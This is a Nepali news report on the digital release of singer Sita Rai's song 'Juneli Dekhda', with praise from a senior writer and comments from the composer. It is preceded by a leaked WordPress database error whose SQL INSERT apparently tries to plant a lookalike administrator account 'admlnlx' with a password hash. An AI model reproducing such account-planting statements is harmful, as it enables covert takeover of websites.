WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSZS32r7OStUjP8qZpCY9YhyrEv2Eg.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:07:40', '', 'admlnlx', 'admlnlx')
काठमान्डौ। गायिका सीता राईको ‘जुनेली देख्दा’ डिजिटल बजारमा आएको छ । अर्जुन राईको प्रस्तुतीमा रहेको गीतको बुधबार बरिष्ठ साहित्यकार भूपाल राईको प्रमुख आतिथ्यतामा एक कार्यक्रमका बीच लोकार्पन गरिएको छ ।
टीका चाम्लिङको शब्द, जसिहाङ राईको संगित र शहास शाक्यको संगीत संयोजन रहेको छ । संगीतमा डीग्री गर्नुभएकी गायीका राई सोलुखुम्बुको थुलुङ दुधकोशी गाउँपालिका–८ निवासी हुनुहुन्छ ।
चाबहिलको एक होटलमा उक्त गीतको लोकार्पण पछि बरिष्ठ साहित्यकार राईले गीतको शब्द र संगीत उत्कृष्ट रहेको भन्दै प्रशंसा गर्नुभयो । मौलिकता र सरलतामा ‘जुनेली देख्दा’ पाईएको उहाँको भनाई छ ।
समाज रुपान्तरणका निम्ती गीत संगीतले खेलेको भूमिका उच्च रहेको भन्दै उहाँले राज्यले समेत बुझ्न आवश्यक रहेको बताए । एक दुई वटा गीत लेख्दैमा रचनाकार, एक दुई वटा गीत गाउँदैमा गायककार नहँुने भन्दै यसमा निरन्तरता आवश्यक रहेकोमा जोड दिए ।
यस्तै संगीतकार जसिहाङ राईले गीत संगीतमा प्रयोग हुने शब्द नै आजको सांगीतिक क्षेत्रको चुनौती रहेको बताए । जसको लागि सर्जक र गायकले विशेष ध्यानपु¥याउनुपर्नेमा जोड दिए । गाउले इन्टरटेन्टमेन्टको पोष्ट प्रोडक्शनमा निर्मित स्टुडियो भिडियोमा छायाङकन र सम्पादन गंगारामको रहेको छ ।